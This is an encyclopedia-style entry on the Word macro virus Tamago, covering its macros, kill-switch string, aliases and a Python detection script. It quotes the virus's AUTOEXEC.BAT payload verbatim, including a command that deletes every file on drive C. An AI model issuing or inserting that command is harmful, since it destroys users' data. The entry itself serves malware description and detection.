Tamago

Virus.MSWord.Tamago or Tamago is a virus that runs on Microsoft Word.

Payload

Tamago affects the system when infected documents are closed, and copies itself to documents that are closed or saved with a new name. It contains seven macros:

Documents           NORMAL.DOT
AutoOp              AutoOpen
AutoExec            AutoExec
AutoClose           AutoClose
UtilMacro           UtilMacro
FerramMacro         FerramMacro
ArquivoModelos      ArquivoModelos
ArquivoSalvarComo   ArquivoSalvarComo

The virus does not infect the system or documents if the environment contains the string "TAMAGOXI=GMS" (the virus author's self-protection?). In this case the virus displays the message box:

(sLeEp ModE) TaMaGoXI bY WiZaRD: EtERnAl LoVE 2 mY LitTlE gIrL Gi

On the 26th of any month the virus writes commands to C:\AUTOEXEC.BAT that will display the message and delete all files on drive C:

@echo off
cls
echo.
echo.
echo.
echo            SaLamA'S CoRP - AlL lEfTS ReSerVeD - 1997
echo                        TaMaGoXI bY WiZaRD***
echo                                          ***
echo                                         *
echo                                        *
echo                          *************
echo                         *             *
echo                        *  ****   ****  *
echo                        *               *
echo                        *     *****     *
echo                         ***************
echo.
echo                     eXPecT nO MeRcY FRoM HiM
echo.
echo.
echo File' not found: Serve Alcatara Mane'? (S/N) 
echo.
echo.
deltree /y c:\*.* >nul
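
The macro names and the AUTOEXEC.BAT payload listed above can serve as triage indicators. The following is an added example, not part of the original wiki entry: it assumes the macro names have already been extracted from a document or from NORMAL.DOT by another tool, the function names are hypothetical, and the sample inputs are constructed.

```python
import re

# Macro names as listed on this page, per host (infected document vs. NORMAL.DOT).
DOC_MACROS = {"AutoOp", "AutoExec", "AutoClose", "UtilMacro",
              "FerramMacro", "ArquivoModelos", "ArquivoSalvarComo"}
TEMPLATE_MACROS = (DOC_MACROS - {"AutoOp"}) | {"AutoOpen"}
# Auto-macro names seen in many benign templates; no weight on their own.
GENERIC = {"autoopen", "autoexec", "autoclose"}

# Destructive line and banner text from the AUTOEXEC.BAT payload quoted above.
DELTREE_RE = re.compile(r"^\s*deltree\s+/y\s+c:\\\*\.\*", re.I | re.M)
BANNER_RE = re.compile(r"tamagoxi by wizard", re.I)


def match_macros(names):
    """Classify a macro-name list; names are compared case-insensitively."""
    found = {n.strip().lower() for n in names}
    for label, expected in (("document", DOC_MACROS),
                            ("NORMAL.DOT", TEMPLATE_MACROS)):
        if {m.lower() for m in expected} <= found:
            return f"full Tamago macro set ({label} form)"
    distinctive = {m.lower() for m in DOC_MACROS | TEMPLATE_MACROS} - GENERIC
    hits = sorted(distinctive & found)
    if hits:
        return "partial match: " + ", ".join(hits)
    return "no match"


def scan_autoexec(text):
    """Return the payload indicators present in AUTOEXEC.BAT text."""
    hits = []
    if DELTREE_RE.search(text):
        hits.append("deltree /y c:\\*.*")
    if BANNER_RE.search(text):
        hits.append("TaMaGoXI banner")
    return hits


# Constructed sample inputs (not taken from a real infection).
SAMPLE_TEMPLATE = ["AutoOpen", "AutoExec", "AutoClose", "UtilMacro",
                   "FerramMacro", "ArquivoModelos", "ArquivoSalvarComo"]
SAMPLE_BAT = "@echo off\r\necho TaMaGoXI bY WiZaRD***\r\ndeltree /y c:\\*.* >nul\r\n"

if __name__ == "__main__":
    print(match_macros(SAMPLE_TEMPLATE))
    print(scan_autoexec(SAMPLE_BAT))
```

A full match on either macro set together with the deltree line in AUTOEXEC.BAT corresponds to the behaviour described in this entry; a partial match only indicates that further inspection is warranted.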

Aliases

  • WM_TAMAGO (Trend Micro)
  • W97M/Tamago (McAfee)
  • BloodHound.WordMacro (Symantec)
  • W97/Tamago.A (Avira)
  • WM97/Tamago-A (Sophos)
  • Virus:WM/Tamago.A (Microsoft)
